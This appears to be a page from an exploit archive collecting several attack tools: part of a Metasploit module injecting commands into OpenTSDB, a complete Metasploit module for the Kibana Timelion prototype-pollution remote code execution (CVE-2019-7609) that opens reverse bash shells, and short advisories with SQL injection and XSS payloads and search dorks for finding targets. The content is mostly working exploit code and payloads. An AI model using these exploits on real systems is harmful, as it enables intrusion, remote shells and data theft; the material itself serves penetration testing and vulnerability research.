})<br /><br /> unless res2<br /> return CheckCode::Unknown('Connection failed.')<br /> end<br /><br /> unless res2.code == 200 && res2.body.include?('version')<br /> return CheckCode::Detected('Target may be OpenTSDB but the version could not be determined.')<br /> end<br /><br /> begin<br /> parsed_res_body = JSON.parse(res2.body)<br /> rescue JSON::ParserError<br /> return CheckCode::Detected('Could not determine the OpenTSDB version: the HTTP response body did not match the expected JSON format.')<br /> end<br /><br /> unless parsed_res_body.is_a?(Hash) && parsed_res_body.key?('version')<br /> return CheckCode::Detected('Could not determine the OpenTSDB version: the HTTP response body did not match the expected JSON format.')<br /> end<br /><br /> version = parsed_res_body['version']<br /><br /> begin<br /> if Rex::Version.new(version) <= Rex::Version.new('2.4.1')<br /> return CheckCode::Appears("The target is OpenTSDB version #{version}")<br /> else<br /> return CheckCode::Safe("The target is OpenTSDB version #{version}")<br /> end<br /> rescue ArgumentError => e<br /> return CheckCode::Unknown("Failed to obtain a valid OpenTSDB version: #{e}")<br /> end<br /> end<br /><br /> def select_metric<br /> # check if any metrics have been configured. if not, exploitation cannot work<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'suggest'),<br /> 'vars_get' => { 'type' => 'metrics' }<br /> })<br /><br /> unless res<br /> fail_with(Failure::Unknown, 'Connection failed.')<br /> end<br /><br /> unless res.code == 200<br /> fail_with(Failure::UnexpectedReply, "Received unexpected status code #{res.code} when checking the configured metrics")<br /> end<br /><br /> begin<br /> metrics = JSON.parse(res.body)<br /> rescue JSON::ParserError<br /> fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured metrics: The response body did not contain valid JSON.')<br /> end<br /><br /> unless metrics.is_a?(Array)<br /> fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured metrics: The response body did not contain a JSON array')<br /> end<br /><br /> if metrics.empty?<br /> fail_with(Failure::NoTarget, 'Failed to identify any configured metrics. This makes exploitation impossible')<br /> end<br /><br /> # select a random metric since any will do<br /> @metric = metrics.sample<br /> print_status("Identified #{metrics.length} configured metrics. Using metric #{@metric}")<br /> end<br /><br /> def select_aggregator<br /> # check the configured aggregators and select one at random<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'aggregators')<br /> })<br /><br /> unless res<br /> fail_with(Failure::Unknown, 'Connection failed.')<br /> end<br /><br /> unless res.code == 200<br /> fail_with(Failure::UnexpectedReply, "Received unexpected status code #{res.code} when checking the configured aggregators")<br /> end<br /><br /> begin<br /> aggregators = JSON.parse(res.body)<br /> rescue JSON::ParserError<br /> fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured aggregators: The response body did not contain valid JSON.')<br /> end<br /><br /> unless aggregators.is_a?(Array)<br /> fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured aggregators: The response body did not contain a JSON array')<br /> end<br /><br /> if aggregators.empty?<br /> fail_with(Failure::NoTarget, 'Failed to identify any configured aggregators. This makes exploitation impossible')<br /> end<br /><br /> # select a random aggregator since any will do<br /> @aggregator = aggregators.sample<br /> print_status("Identified #{aggregators.length} configured aggregators. Using aggregator #{@aggregator}")<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> # we need to percent encode the entire command.<br /> # however, the + character cannot be used and percent encoding does not help for it. so we need to change chmod +x with chmod 744<br /> cmd = CGI.escape(cmd.gsub('chmod +x', 'chmod 744'))<br /> start_time = rand(20.year.ago..10.year.ago) # this should be a date far enough in the past to make sure we capture all possible data<br /> start_value = start_time.strftime('%Y/%m/%d-%H:%M:%S')<br /> end_time = rand(1.year.since..10.year.since) # this can be a date in the future to make sure we capture all possible data<br /> end_value = end_time.strftime('%Y/%m/%d-%H:%M:%S')<br /> get_vars = {<br /> 'start' => start_value,<br /> 'end' => end_value,<br /> 'm' => "#{@aggregator}:#{@metric}",<br /> 'o' => 'axis+x1y2',<br /> 'ylabel' => Rex::Text.rand_text_alphanumeric(8..12),<br /> 'y2label' => Rex::Text.rand_text_alphanumeric(8..12),<br /> 'yrange' => '[0:]',<br /> 'y2range' => '[0:]',<br /> 'key' => "%3Bsystem%20%22#{cmd}%22%20%22",<br /> 'wxh' => "#{rand(800..1600)}x#{rand(400..600)}",<br /> 'style' => 'linespoint'<br /> }<br /><br /> exploit_uri = '?'<br /> get_vars.each do |key, value|<br /> exploit_uri += "#{key}=#{value}&"<br /> end<br /> exploit_uri += 'json'<br /><br /> # using a raw request because cgi was leading to encoding issues<br /> send_request_raw({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'q' + exploit_uri)<br /> }, 0) # we don't have to wait for a reply here<br /> end<br /><br /> def exploit<br /> select_metric<br /> select_aggregator<br /> print_status('Executing the payload')<br /> execute_command(payload.encoded)<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ManualRanking<br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Kibana Timelion Prototype Pollution RCE',<br /> 'Description' => %q{<br /> Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer.<br /> An attacker with access to the Timelion application could send a request that will attempt to execute<br /> javascript code. This leads to an arbitrary command execution with permissions of the<br /> Kibana process on the host system.<br /><br /> Exploitation will require a service or system reboot to restore normal operation.<br /><br /> The WFSDELAY parameter is crucial for this exploit. Setting it too high will cause MANY shells<br /> (50-100+), while setting it too low will cause no shells to be obtained. WFSDELAY of 10 for a<br /> docker image caused 6 shells.<br /><br /> Tested against kibana 6.5.4.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die', # msf module<br /> 'Michał Bentkowski', # original PoC, analysis<br /> 'Gaetan Ferry' # more analysis<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://github.com/mpgn/CVE-2019-7609'],<br /> [ 'URL', 'https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/'],<br /> [ 'CVE', '2019-7609']<br /> ],<br /> 'Platform' => ['unix'],<br /> 'Privileged' => false,<br /> 'Arch' => ARCH_CMD,<br /> 'Targets' => [<br /> [ 'Automatic Target', {}]<br /> ],<br /> 'DisclosureDate' => '2019-10-30',<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_bash',<br /> 'WfsDelay' => 10 # can take a minute to run<br /> },<br /> 'Notes' => {<br /> # the webserver doesn't die, but certain requests no longer respond before a timeout<br /> # when things go poorly<br /> 'Stability' => [CRASH_SERVICE_DOWN],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> Opt::RPORT(5601),<br /> OptString.new('TARGETURI', [ true, 'The URI of the Kibana Application', '/'])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'app', 'kibana'),<br /> 'method' => 'GET',<br /> 'keep_cookies' => true<br /> )<br /> return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?<br /> return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200<br /><br /> # this pulls a big JSON blob that we need as it has the version<br /> unless %r{<kbn-injected-metadata data="([^"]+)"></kbn-injected-metadata>} =~ res.body<br /> return Exploit::CheckCode::Safe("#{peer} - Unexpected response, unable to determine version")<br /> end<br /><br /> version_json = CGI.unescapeHTML(Regexp.last_match(1))<br /><br /> begin<br /> json_body = JSON.parse(version_json)<br /> rescue JSON::ParserError<br /> return Exploit::CheckCode::Safe("#{peer} - Unexpected response, unable to determine version")<br /> end<br /><br /> return Exploit::CheckCode::Safe("#{peer} - Unexpected response, unable to determine version") if json_body['version'].nil?<br /><br /> @version = json_body['version']<br /><br /> if Rex::Version.new(@version) < Rex::Version.new('5.6.15') ||<br /> (<br /> Rex::Version.new(@version) < Rex::Version.new('6.6.1') &&<br /> Rex::Version.new(@version) >= Rex::Version.new('6.0.0')<br /> )<br /> return CheckCode::Appears("Exploitable Version Detected: #{@version}")<br /> end<br /><br /> CheckCode::Safe("Unexploitable Version Detected: #{@version}")<br /> end<br /><br /> def get_xsrf<br /> vprint_status('Grabbing XSRF Token')<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'bundles', 'canvas.bundle.js'),<br /> 'keep_cookies' => true<br /> )<br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200<br /><br /> return Regexp.last_match(1) if /"kbn-xsrf":"([^"]+)"/ =~ res.body<br /><br /> nil<br /> end<br /><br /> def trigger_socket<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'socket.io/'), # trailing / is required<br /> 'keep_cookies' => true,<br /> 'headers' => {<br /> 'kbn-xsrf' => @xsrf<br /> },<br /> 'vars_get' => {<br /> 'EIO' => 3,<br /> 'transport' => 'polling'<br /> }<br /> )<br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200<br /> end<br /><br /> def send_injection(reset: false)<br /> if reset<br /> pload = ".es(*).props(label.__proto__.env.AAAA='').props(label.__proto__.env.NODE_OPTIONS='')"<br /> else<br /> # we leave a marker for our payload to avoid having .to_json process it and make it unusable by the host OS<br /> pload = %|.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("PAYLOADHERE");process.exit()//').props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')|<br /> end<br /> body = {<br /> 'sheet' => [pload],<br /> 'time' => {<br /> 'from' => 'now-15m',<br /> 'to' => 'now',<br /> 'mode' => 'quick',<br /> 'interval' => 'auto',<br /> 'timezone' => 'America/New_York'<br /> }<br /> }<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'api', 'timelion', 'run'),<br /> 'method' => 'POST',<br /> 'ctype' => 'application/json',<br /> 'headers' => { 'kbn-version' => @version },<br /> 'data' => body.to_json.sub('PAYLOADHERE', payload.encoded.gsub("'", "\\\\\\\\\\\\\\\\'")),<br /> 'keep_cookies' => true<br /> )<br /> Rex.sleep(2) # let this take hold, if we go too fast we dont get the shell<br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200<br /> end<br /><br /> def exploit<br /> check if @version.nil?<br /> print_status('Polluting Prototype in Timelion')<br /> send_injection<br /><br /> @xsrf = get_xsrf<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Unable to grab XSRF token") if @xsrf.nil?<br /><br /> print_status('Trigginger payload execution via canvas socket')<br /> trigger_socket<br /> print_status('Waiting for shells')<br /> Rex.sleep(datastore['WFSDELAY'] / 10)<br /> unless @reset_done<br /> print_status('Unsetting to stop raining shells from a lacerated kibana')<br /> send_injection(reset: true)<br /> trigger_socket<br /> end<br /> end<br /><br /> def on_new_session(_client)<br /> return if @reset_done<br /><br /> print_status('Unsetting to stop raining shells from a lacerated kibana')<br /> send_injection(reset: true)<br /> trigger_socket<br /> @reset_done = true<br /> ensure<br /> super<br /> end<br /><br />end<br /></code></pre>
<pre><code>======================================================================================================================================<br />| # Title : JPC2 CMS v1.0 Sql injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit) |<br />| # Vendor : https://www.facebook.com/JPC2GroupWeb | <br />| # Dork : "Web design and development JPC2 Group Web" |<br />======================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] inject here : http://127.0.0.1/wwwnpmlexcom/en/pagina.php?idcate=13<br /><br />[+] Panel : http://127.0.0.1/wwwnpmlexcom/en/administrador/<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Izdelava IDS v2.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit) | <br />| # Vendor : http://studiointera.net | <br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : /preview.php?id=9'<script>alert(/indoushka/);</script><br /><br />[+] http://127.0.0.1/gspostojnanet/vnosi/cms/preview.php?id=9%27%3Cscript%3Ealert(/indoushka/);%3C/script%3E<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>## Title: Meeting Room Booking System-1.0 Multiple - SQLi<br />## Author: nu11secur1ty<br />## Date: 09/06/2023<br />## Vendor: https://www.phpjabbers.com/<br />## Software: https://www.phpjabbers.com/meeting-room-booking-system/#sectionDemo<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The column parameter appears to be vulnerable to SQL injection<br />attacks. The payload ' was submitted in the column parameter, and a<br />database error message was returned. The attacker easily can steal all<br />information from the database of this web application!<br />WARNING! All of you: Be careful what you buy! This will be your responsibility!<br /><br />STATUS: HIGH-CRITICAL Vulnerability<br /><br />[+]Payload:<br />```mysql<br />---<br />Parameter: column (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)<br /> Payload: controller=pjFront&action=pjActionRooms&locale=1&index=2467&column=(SELECT<br />6118 FROM(SELECT COUNT(*),CONCAT(0x716a717171,(SELECT<br />(ELT(6118=6118,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&direction=ASC&page=1<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind - Parameter replace<br /> Payload: controller=pjFront&action=pjActionRooms&locale=1&index=2467&column=(CASE<br />WHEN (6735=6735) THEN SLEEP(5) ELSE 6735 END)&direction=ASC&page=1<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Meeting-Room-Booking-System-1.0)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/09/meeting-room-booking-system-10-multiple.html)<br /><br />## Time spent:<br />01:47:00<br /><br /><br /></code></pre>